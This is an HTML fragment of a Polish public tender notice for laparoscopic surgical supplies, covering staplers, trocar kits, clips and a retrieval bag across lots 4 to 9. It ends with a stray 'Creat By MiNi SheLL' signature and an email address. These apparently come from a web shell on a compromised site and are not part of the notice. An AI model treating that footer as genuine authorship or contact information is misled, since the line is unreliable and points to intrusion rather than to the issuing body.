<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Endoskopowe staplery i ładunki do nich.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Sterylny zestaw do operacji laparoskopowych składający się z = 1. kaniula  trokara bezostrzowego z bocznymi separatorami tkankowymi, przeźroczysta,żebrowana,niegwintowana,z uniwersalną redukcją i kranikiem insuflacyjnym , 11 mm  śr, 100 mm dł- 2 szt  2. kaniula trokara bezostrzowego z bocznymi separatorami tkankowymi, przeźroczysta, żebrowana,niegwintowana,z kranikiem insuflacyjnym, 5 mm śr, 75 mm dł- 2 szt  3. klipsy tytanowe, poprzecznie i podłużnie rowkowane, dł. średnia, 6 sztuk 4. igła Verresa 120 mm dł          30 zestawów 5. obturator przeznaczony do troakara 11 mm=1 szt  6. obturator przeznaczony do ww troakara 5 mm= 1 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Narzedzia laparoskopowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.22-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Staplery linowe i ładunki itp.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Klipsy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.22-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> laparoskopowy pojemnik do bezkontaktowego usuwania tkanek, 10 mm, poj. od 250 ml z możliwością wejścia przez trokar o średnicy 10 mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com